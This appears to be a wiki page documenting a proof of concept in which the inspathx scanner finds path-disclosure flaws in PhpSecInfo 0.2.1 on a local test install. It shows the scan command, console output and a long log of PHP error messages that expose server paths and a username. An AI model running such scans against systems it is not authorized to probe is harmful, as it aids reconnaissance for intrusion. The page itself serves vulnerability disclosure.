Inspathx/PoC1
Jump to navigation
Jump to search
| You are here: | Poc #1: PhpSecInfo-0.2.1
|
Description
PhpSecInfo provides an equivalent to the phpinfo() function that reports security information about the PHP environment, and offers suggestions for improvement. It is not a replacement for secure development techniques, and does not do any kind of code or app auditing, but can be a useful tool in a multilayered security approach.
In the time of this writing, the latest version available (0.2.1) suffers from path disclosure.
This section shows the results of Inspathx run against PhpSecInfo-0.2.1.
Inspathx output
$ ruby inspathx.rb -d paths_vuln/PhpSecInfo -u http://localhost/phpsecinfo ============================================================= Path Discloser (a.k.a inspathx) / Error Hunter (c) Aung Khant, aungkhant[at]yehg.net YGN Ethical Hacker Group, Myanmar, http://yehg.net/ svn co http://inspathx.googlecode.com/svn/trunk/ inspathx ============================================================= # target: http://localhost/phpsecinfo/ # source: paths_vuln/PhpSecInfo # log file: localhost_phpsecinfo_.log # follow redirect: false # null cookie: false # total threads: 10 # time: 07:45:39 01-31-2011 [*] http://localhost/phpsecinfo/Test/Test_Session.php [*] http://localhost/phpsecinfo/Test/Test_Curl.php [*] http://localhost/phpsecinfo/Test/Test_Core.php [*] http://localhost/phpsecinfo/Test/Test_Cgi.php [*] http://localhost/phpsecinfo/Test/Test.php [*] http://localhost/phpsecinfo/Test/Session/save_path.php [*] http://localhost/phpsecinfo/Test/Session/use_trans_sid.php [*] http://localhost/phpsecinfo/Test/Core/upload_tmp_dir.php [*] http://localhost/phpsecinfo/Test/Core/uid.php [*] http://localhost/phpsecinfo/Test/Core/register_globals.php [*] http://localhost/phpsecinfo/Test/Core/post_max_size.php [*] http://localhost/phpsecinfo/Test/Core/upload_max_filesize.php [*] http://localhost/phpsecinfo/Test/Curl/file_support.php [*] http://localhost/phpsecinfo/Test/Core/open_basedir.php [*] http://localhost/phpsecinfo/Test/Core/memory_limit.php [*] http://localhost/phpsecinfo/Test/Core/gid.php [*] http://localhost/phpsecinfo/Test/Core/magic_quotes_gpc.php [*] http://localhost/phpsecinfo/Test/Core/file_uploads.php [*] http://localhost/phpsecinfo/Test/Core/expose_php.php [*] http://localhost/phpsecinfo/Test/Core/allow_url_fopen.php [*] http://localhost/phpsecinfo/Test/Core/display_errors.php [*] http://localhost/phpsecinfo/Test/Core/allow_url_include.php [*] http://localhost/phpsecinfo/Test/CGI/force_redirect.php # waiting for child threads to finish .. .... ! Username detected = attacker # vulnerable url(s) = 23 # total requests = 84 # done at 07:48:43 01-31-2011 Send bugs, suggestions, contributions to inspathx[at]yehg.net
Log file
# Logfile created on Mon Jan 31 07:45:39 +0100 2011 by logger.rb/22285 I, [2011-01-31 07:45:39 pid:#9705] INFO -- : TargetURL: http://localhost/phpsecinfo/ I, [2011-01-31 07:45:39 pid:#9705] INFO -- : Source: paths_vuln/PhpSecInfo I, [2011-01-31 07:45:39 pid:#9705] INFO -- : Settings: follow redirect: false,null cookie: false, total threads: 10 I, [2011-01-31 07:45:39 pid:#9705] INFO -- : Date: 07:45:39 01-31-2011 I, [2011-01-31 07:46:48 pid:#9705] INFO -- : [*] http://localhost/phpsecinfo/Test/Test_Session.php [html_source] <br /> <b>Warning</b>: require_once(PhpSecInfo/Test/Test.php) [<a href='function.require-once'>function.require-once</a>]: failed to open stream: No such file or directory in <b>/home/attacker/public_html/phpsecinfo/Test/Test_Session.php</b> on line <b>13</b><br /> <br /> <b>Fatal error</b>: require_once() [<a href='function.require'>function.require</a>]: Failed opening required 'PhpSecInfo/Test/Test.php' (include_path='.:/usr/lib/php:/usr/local/lib/php') in <b>/home/attacker/public_html/phpsecinfo/Test/Test_Session.php</b> on line <b>13</b><br /> [/html_source] I, [2011-01-31 07:46:49 pid:#9705] INFO -- : [*] http://localhost/phpsecinfo/Test/Test_Curl.php [html_source] <br /> <b>Warning</b>: require_once(PhpSecInfo/Test/Test.php) [<a href='function.require-once'>function.require-once</a>]: failed to open stream: No such file or directory in <b>/home/attacker/public_html/phpsecinfo/Test/Test_Curl.php</b> on line <b>12</b><br /> <br /> <b>Fatal error</b>: require_once() [<a href='function.require'>function.require</a>]: Failed opening required 'PhpSecInfo/Test/Test.php' (include_path='.:/usr/lib/php:/usr/local/lib/php') in <b>/home/attacker/public_html/phpsecinfo/Test/Test_Curl.php</b> on line <b>12</b><br /> [/html_source] I, [2011-01-31 07:46:49 pid:#9705] INFO -- : [*] http://localhost/phpsecinfo/Test/Test_Core.php [html_source] <br /> <b>Warning</b>: require_once(PhpSecInfo/Test/Test.php) [<a href='function.require-once'>function.require-once</a>]: failed to open stream: No such file or directory in <b>/home/attacker/public_html/phpsecinfo/Test/Test_Core.php</b> on line <b>12</b><br /> <br /> <b>Fatal error</b>: require_once() [<a href='function.require'>function.require</a>]: Failed opening required 'PhpSecInfo/Test/Test.php' (include_path='.:/usr/lib/php:/usr/local/lib/php') in <b>/home/attacker/public_html/phpsecinfo/Test/Test_Core.php</b> on line <b>12</b><br /> [/html_source] I, [2011-01-31 07:46:49 pid:#9705] INFO -- : [*] http://localhost/phpsecinfo/Test/Test_Cgi.php [html_source] <br /> <b>Warning</b>: require_once(PhpSecInfo/Test/Test.php) [<a href='function.require-once'>function.require-once</a>]: failed to open stream: No such file or directory in <b>/home/attacker/public_html/phpsecinfo/Test/Test_Cgi.php</b> on line <b>12</b><br /> <br /> <b>Fatal error</b>: require_once() [<a href='function.require'>function.require</a>]: Failed opening required 'PhpSecInfo/Test/Test.php' (include_path='.:/usr/lib/php:/usr/local/lib/php') in <b>/home/attacker/public_html/phpsecinfo/Test/Test_Cgi.php</b> on line <b>12</b><br /> [/html_source] I, [2011-01-31 07:46:59 pid:#9705] INFO -- : [*] http://localhost/phpsecinfo/Test/Test.php [html_source] <br /> <b>Warning</b>: require_once(PhpSecInfo/PhpSecInfo.php) [<a href='function.require-once'>function.require-once</a>]: failed to open stream: No such file or directory in <b>/home/attacker/public_html/phpsecinfo/Test/Test.php</b> on line <b>12</b><br /> <br /> <b>Fatal error</b>: require_once() [<a href='function.require'>function.require</a>]: Failed opening required 'PhpSecInfo/PhpSecInfo.php' (include_path='.:/usr/lib/php:/usr/local/lib/php') in <b>/home/attacker/public_html/phpsecinfo/Test/Test.php</b> on line <b>12</b><br /> [/html_source] I, [2011-01-31 07:47:00 pid:#9705] INFO -- : [*] http://localhost/phpsecinfo/Test/Session/save_path.php [html_source] <br /> <b>Warning</b>: require_once(PhpSecInfo/Test/Test_Session.php) [<a href='function.require-once'>function.require-once</a>]: failed to open stream: No such file or directory in <b>/home/attacker/public_html/phpsecinfo/Test/Session/save_path.php</b> on line <b>12</b><br /> <br /> <b>Fatal error</b>: require_once() [<a href='function.require'>function.require</a>]: Failed opening required 'PhpSecInfo/Test/Test_Session.php' (include_path='.:/usr/lib/php:/usr/local/lib/php') in <b>/home/attacker/public_html/phpsecinfo/Test/Session/save_path.php</b> on line <b>12</b><br /> [/html_source] I, [2011-01-31 07:47:00 pid:#9705] INFO -- : [*] http://localhost/phpsecinfo/Test/Session/use_trans_sid.php [html_source] <br /> <b>Warning</b>: require_once(PhpSecInfo/Test/Test_Session.php) [<a href='function.require-once'>function.require-once</a>]: failed to open stream: No such file or directory in <b>/home/attacker/public_html/phpsecinfo/Test/Session/use_trans_sid.php</b> on line <b>13</b><br /> <br /> <b>Fatal error</b>: require_once() [<a href='function.require'>function.require</a>]: Failed opening required 'PhpSecInfo/Test/Test_Session.php' (include_path='.:/usr/lib/php:/usr/local/lib/php') in <b>/home/attacker/public_html/phpsecinfo/Test/Session/use_trans_sid.php</b> on line <b>13</b><br /> [/html_source] I, [2011-01-31 07:47:10 pid:#9705] INFO -- : [*] http://localhost/phpsecinfo/Test/Core/upload_tmp_dir.php [html_source] <br /> <b>Warning</b>: require_once(PhpSecInfo/Test/Test_Core.php) [<a href='function.require-once'>function.require-once</a>]: failed to open stream: No such file or directory in <b>/home/attacker/public_html/phpsecinfo/Test/Core/upload_tmp_dir.php</b> on line <b>12</b><br /> <br /> <b>Fatal error</b>: require_once() [<a href='function.require'>function.require</a>]: Failed opening required 'PhpSecInfo/Test/Test_Core.php' (include_path='.:/usr/lib/php:/usr/local/lib/php') in <b>/home/attacker/public_html/phpsecinfo/Test/Core/upload_tmp_dir.php</b> on line <b>12</b><br /> [/html_source] I, [2011-01-31 07:47:10 pid:#9705] INFO -- : [*] http://localhost/phpsecinfo/Test/Core/uid.php [html_source] <br /> <b>Warning</b>: require_once(PhpSecInfo/Test/Test_Core.php) [<a href='function.require-once'>function.require-once</a>]: failed to open stream: No such file or directory in <b>/home/attacker/public_html/phpsecinfo/Test/Core/uid.php</b> on line <b>13</b><br /> <br /> <b>Fatal error</b>: require_once() [<a href='function.require'>function.require</a>]: Failed opening required 'PhpSecInfo/Test/Test_Core.php' (include_path='.:/usr/lib/php:/usr/local/lib/php') in <b>/home/attacker/public_html/phpsecinfo/Test/Core/uid.php</b> on line <b>13</b><br /> [/html_source] I, [2011-01-31 07:47:10 pid:#9705] INFO -- : [*] http://localhost/phpsecinfo/Test/Core/register_globals.php [html_source] <br /> <b>Warning</b>: require_once(PhpSecInfo/Test/Test_Core.php) [<a href='function.require-once'>function.require-once</a>]: failed to open stream: No such file or directory in <b>/home/attacker/public_html/phpsecinfo/Test/Core/register_globals.php</b> on line <b>13</b><br /> <br /> <b>Fatal error</b>: require_once() [<a href='function.require'>function.require</a>]: Failed opening required 'PhpSecInfo/Test/Test_Core.php' (include_path='.:/usr/lib/php:/usr/local/lib/php') in <b>/home/attacker/public_html/phpsecinfo/Test/Core/register_globals.php</b> on line <b>13</b><br /> [/html_source] I, [2011-01-31 07:47:11 pid:#9705] INFO -- : [*] http://localhost/phpsecinfo/Test/Core/post_max_size.php [html_source] <br /> <b>Warning</b>: require_once(PhpSecInfo/Test/Test_Core.php) [<a href='function.require-once'>function.require-once</a>]: failed to open stream: No such file or directory in <b>/home/attacker/public_html/phpsecinfo/Test/Core/post_max_size.php</b> on line <b>13</b><br /> <br /> <b>Fatal error</b>: require_once() [<a href='function.require'>function.require</a>]: Failed opening required 'PhpSecInfo/Test/Test_Core.php' (include_path='.:/usr/lib/php:/usr/local/lib/php') in <b>/home/attacker/public_html/phpsecinfo/Test/Core/post_max_size.php</b> on line <b>13</b><br /> [/html_source] I, [2011-01-31 07:47:11 pid:#9705] INFO -- : [*] http://localhost/phpsecinfo/Test/Core/upload_max_filesize.php [html_source] <br /> <b>Warning</b>: require_once(PhpSecInfo/Test/Test_Core.php) [<a href='function.require-once'>function.require-once</a>]: failed to open stream: No such file or directory in <b>/home/attacker/public_html/phpsecinfo/Test/Core/upload_max_filesize.php</b> on line <b>12</b><br /> <br /> <b>Fatal error</b>: require_once() [<a href='function.require'>function.require</a>]: Failed opening required 'PhpSecInfo/Test/Test_Core.php' (include_path='.:/usr/lib/php:/usr/local/lib/php') in <b>/home/attacker/public_html/phpsecinfo/Test/Core/upload_max_filesize.php</b> on line <b>12</b><br /> [/html_source] I, [2011-01-31 07:47:13 pid:#9705] INFO -- : [*] http://localhost/phpsecinfo/Test/Curl/file_support.php [html_source] <br /> <b>Warning</b>: require_once(PhpSecInfo/Test/Test_Curl.php) [<a href='function.require-once'>function.require-once</a>]: failed to open stream: No such file or directory in <b>/home/attacker/public_html/phpsecinfo/Test/Curl/file_support.php</b> on line <b>12</b><br /> <br /> <b>Fatal error</b>: require_once() [<a href='function.require'>function.require</a>]: Failed opening required 'PhpSecInfo/Test/Test_Curl.php' (include_path='.:/usr/lib/php:/usr/local/lib/php') in <b>/home/attacker/public_html/phpsecinfo/Test/Curl/file_support.php</b> on line <b>12</b><br /> [/html_source] I, [2011-01-31 07:47:23 pid:#9705] INFO -- : [*] http://localhost/phpsecinfo/Test/Core/open_basedir.php [html_source] <br /> <b>Warning</b>: require_once(PhpSecInfo/Test/Test_Core.php) [<a href='function.require-once'>function.require-once</a>]: failed to open stream: No such file or directory in <b>/home/attacker/public_html/phpsecinfo/Test/Core/open_basedir.php</b> on line <b>13</b><br /> <br /> <b>Fatal error</b>: require_once() [<a href='function.require'>function.require</a>]: Failed opening required 'PhpSecInfo/Test/Test_Core.php' (include_path='.:/usr/lib/php:/usr/local/lib/php') in <b>/home/attacker/public_html/phpsecinfo/Test/Core/open_basedir.php</b> on line <b>13</b><br /> [/html_source] I, [2011-01-31 07:47:23 pid:#9705] INFO -- : [*] http://localhost/phpsecinfo/Test/Core/memory_limit.php [html_source] <br /> <b>Warning</b>: require_once(PhpSecInfo/Test/Test_Core.php) [<a href='function.require-once'>function.require-once</a>]: failed to open stream: No such file or directory in <b>/home/attacker/public_html/phpsecinfo/Test/Core/memory_limit.php</b> on line <b>15</b><br /> <br /> <b>Fatal error</b>: require_once() [<a href='function.require'>function.require</a>]: Failed opening required 'PhpSecInfo/Test/Test_Core.php' (include_path='.:/usr/lib/php:/usr/local/lib/php') in <b>/home/attacker/public_html/phpsecinfo/Test/Core/memory_limit.php</b> on line <b>15</b><br /> [/html_source] I, [2011-01-31 07:47:23 pid:#9705] INFO -- : [*] http://localhost/phpsecinfo/Test/Core/gid.php [html_source] <br /> <b>Warning</b>: require_once(PhpSecInfo/Test/Test_Core.php) [<a href='function.require-once'>function.require-once</a>]: failed to open stream: No such file or directory in <b>/home/attacker/public_html/phpsecinfo/Test/Core/gid.php</b> on line <b>13</b><br /> <br /> <b>Fatal error</b>: require_once() [<a href='function.require'>function.require</a>]: Failed opening required 'PhpSecInfo/Test/Test_Core.php' (include_path='.:/usr/lib/php:/usr/local/lib/php') in <b>/home/attacker/public_html/phpsecinfo/Test/Core/gid.php</b> on line <b>13</b><br /> [/html_source] I, [2011-01-31 07:47:24 pid:#9705] INFO -- : [*] http://localhost/phpsecinfo/Test/Core/magic_quotes_gpc.php [html_source] <br /> <b>Warning</b>: require_once(PhpSecInfo/Test/Test_Core.php) [<a href='function.require-once'>function.require-once</a>]: failed to open stream: No such file or directory in <b>/home/attacker/public_html/phpsecinfo/Test/Core/magic_quotes_gpc.php</b> on line <b>14</b><br /> <br /> <b>Fatal error</b>: require_once() [<a href='function.require'>function.require</a>]: Failed opening required 'PhpSecInfo/Test/Test_Core.php' (include_path='.:/usr/lib/php:/usr/local/lib/php') in <b>/home/attacker/public_html/phpsecinfo/Test/Core/magic_quotes_gpc.php</b> on line <b>14</b><br /> [/html_source] I, [2011-01-31 07:47:24 pid:#9705] INFO -- : [*] http://localhost/phpsecinfo/Test/Core/file_uploads.php [html_source] <br /> <b>Warning</b>: require_once(PhpSecInfo/Test/Test_Core.php) [<a href='function.require-once'>function.require-once</a>]: failed to open stream: No such file or directory in <b>/home/attacker/public_html/phpsecinfo/Test/Core/file_uploads.php</b> on line <b>13</b><br /> <br /> <b>Fatal error</b>: require_once() [<a href='function.require'>function.require</a>]: Failed opening required 'PhpSecInfo/Test/Test_Core.php' (include_path='.:/usr/lib/php:/usr/local/lib/php') in <b>/home/attacker/public_html/phpsecinfo/Test/Core/file_uploads.php</b> on line <b>13</b><br /> [/html_source] I, [2011-01-31 07:47:24 pid:#9705] INFO -- : [*] http://localhost/phpsecinfo/Test/Core/expose_php.php [html_source] <br /> <b>Warning</b>: require_once(PhpSecInfo/Test/Test_Core.php) [<a href='function.require-once'>function.require-once</a>]: failed to open stream: No such file or directory in <b>/home/attacker/public_html/phpsecinfo/Test/Core/expose_php.php</b> on line <b>13</b><br /> <br /> <b>Fatal error</b>: require_once() [<a href='function.require'>function.require</a>]: Failed opening required 'PhpSecInfo/Test/Test_Core.php' (include_path='.:/usr/lib/php:/usr/local/lib/php') in <b>/home/attacker/public_html/phpsecinfo/Test/Core/expose_php.php</b> on line <b>13</b><br /> [/html_source] I, [2011-01-31 07:47:37 pid:#9705] INFO -- : [*] http://localhost/phpsecinfo/Test/Core/allow_url_fopen.php [html_source] <br /> <b>Warning</b>: require_once(PhpSecInfo/Test/Test_Core.php) [<a href='function.require-once'>function.require-once</a>]: failed to open stream: No such file or directory in <b>/home/attacker/public_html/phpsecinfo/Test/Core/allow_url_fopen.php</b> on line <b>13</b><br /> <br /> <b>Fatal error</b>: require_once() [<a href='function.require'>function.require</a>]: Failed opening required 'PhpSecInfo/Test/Test_Core.php' (include_path='.:/usr/lib/php:/usr/local/lib/php') in <b>/home/attacker/public_html/phpsecinfo/Test/Core/allow_url_fopen.php</b> on line <b>13</b><br /> [/html_source] I, [2011-01-31 07:47:38 pid:#9705] INFO -- : [*] http://localhost/phpsecinfo/Test/Core/display_errors.php [html_source] <br /> <b>Warning</b>: require_once(PhpSecInfo/Test/Test_Core.php) [<a href='function.require-once'>function.require-once</a>]: failed to open stream: No such file or directory in <b>/home/attacker/public_html/phpsecinfo/Test/Core/display_errors.php</b> on line <b>13</b><br /> <br /> <b>Fatal error</b>: require_once() [<a href='function.require'>function.require</a>]: Failed opening required 'PhpSecInfo/Test/Test_Core.php' (include_path='.:/usr/lib/php:/usr/local/lib/php') in <b>/home/attacker/public_html/phpsecinfo/Test/Core/display_errors.php</b> on line <b>13</b><br /> [/html_source] I, [2011-01-31 07:47:38 pid:#9705] INFO -- : [*] http://localhost/phpsecinfo/Test/Core/allow_url_include.php [html_source] <br /> <b>Warning</b>: require_once(PhpSecInfo/Test/Test_Core.php) [<a href='function.require-once'>function.require-once</a>]: failed to open stream: No such file or directory in <b>/home/attacker/public_html/phpsecinfo/Test/Core/allow_url_include.php</b> on line <b>13</b><br /> <br /> <b>Fatal error</b>: require_once() [<a href='function.require'>function.require</a>]: Failed opening required 'PhpSecInfo/Test/Test_Core.php' (include_path='.:/usr/lib/php:/usr/local/lib/php') in <b>/home/attacker/public_html/phpsecinfo/Test/Core/allow_url_include.php</b> on line <b>13</b><br /> [/html_source] I, [2011-01-31 07:47:38 pid:#9705] INFO -- : [*] http://localhost/phpsecinfo/Test/CGI/force_redirect.php [html_source] <br /> <b>Warning</b>: require_once(PhpSecInfo/Test/Test_Cgi.php) [<a href='function.require-once'>function.require-once</a>]: failed to open stream: No such file or directory in <b>/home/attacker/public_html/phpsecinfo/Test/CGI/force_redirect.php</b> on line <b>12</b><br /> <br /> <b>Fatal error</b>: require_once() [<a href='function.require'>function.require</a>]: Failed opening required 'PhpSecInfo/Test/Test_Cgi.php' (include_path='.:/usr/lib/php:/usr/local/lib/php') in <b>/home/attacker/public_html/phpsecinfo/Test/CGI/force_redirect.php</b> on line <b>12</b><br /> [/html_source] I, [2011-01-31 07:48:43 pid:#9705] INFO -- : ! Username detected = attacker I, [2011-01-31 07:48:43 pid:#9705] INFO -- : Vulnerable url(s) = 23 I, [2011-01-31 07:48:43 pid:#9705] INFO -- : Total requests = 84 I, [2011-01-31 07:48:43 pid:#9705] INFO -- : Generated by inspathx, path disclosure finder tool I, [2011-01-31 07:48:43 pid:#9705] INFO -- : by Aung Khant, http://yehg.net/lab I, [2011-01-31 07:48:43 pid:#9705] INFO -- : Send bugs, suggestions, contributions to inspathx[at]yehg.net